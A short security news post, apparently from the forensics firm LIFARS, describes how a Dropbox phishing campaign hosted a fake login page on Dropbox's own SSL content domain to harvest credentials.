Phishing attacks are commonplace nowadays. While some of them are of amateur make, a recent Dropbox phishing attack is anything but poor of design. The author of this phishing campaign came up with a clever idea, following in the footsteps of his predecessor who pulled off a similar phishing scam using Google Docs and Drive.
HOW DOES THIS PHISHING CAMPAIGN DIFFER FROM THE REST?
According to Symantec, the scam email arrives in a victim’s mailbox with the subject “important.” The email goes on to claim that the victim has been sent a large file that cannot be sent via email for security reasons. Next, the email asks the recipient to pick up the file by clicking on a link that takes him/her to a fake Dropbox login page. Here is where it gets tricky: the fake login page is indeed hosted on Dropbox’s user content domain. The same way as any other file you upload to Dropbox would be hosted. The landing page itself is served over SSL (just like any other file hosted on Dropbox), which further solidifies people’s trust in the page.
There is one major difference between this login page and the real Dropbox page: on the fake page, you also have icons of popular web-based email services, including Gmail and Yahoo mail to give the victims a feeling they can use those credentials for logging in as well. Once the user hits the Sign in button, the credentials are submitted to a compromised Web server over SSL- another critical point in the attack, without which, the attack’s effectiveness would drop sharply.
The page did actually contain some non-SSL resources, such as pictures and style sheets. Users using new Web browsers might have seen a warning that the page contains non-secure content, but it’s likely that a majority of users did not know what this means and dismissed the warnings. The page itself has already been taken down by Dropbox.
About the author
LIFARS is the global leader in Digital Forensics and Cyber Resiliency Services. Our experience spans two decades working on high profile events, often in concert with Law Enforcement Agencies around the world. Our proprietary methodology derives directly and indirectly from our experience working with and for U.S. Intelligence Agencies, Interpol, Europol, and NATO. We are solely dedicated to Cyber Resiliency and thus pay close attention to all aspects of our clients’ engagements experience while providing a strategic and integrated array of services to minimum risk and disruption while protecting your brand.
Details have emerged on a phishing attack which saw hackers steal the credentials of over 50,000...Read more arrow_forward
A Canadian national accused by the United States of helping Russian intelligence agents breach into...Read more arrow_forward
A new study by Google has revealed insights to better explain how emails and other accounts are...Read more arrow_forward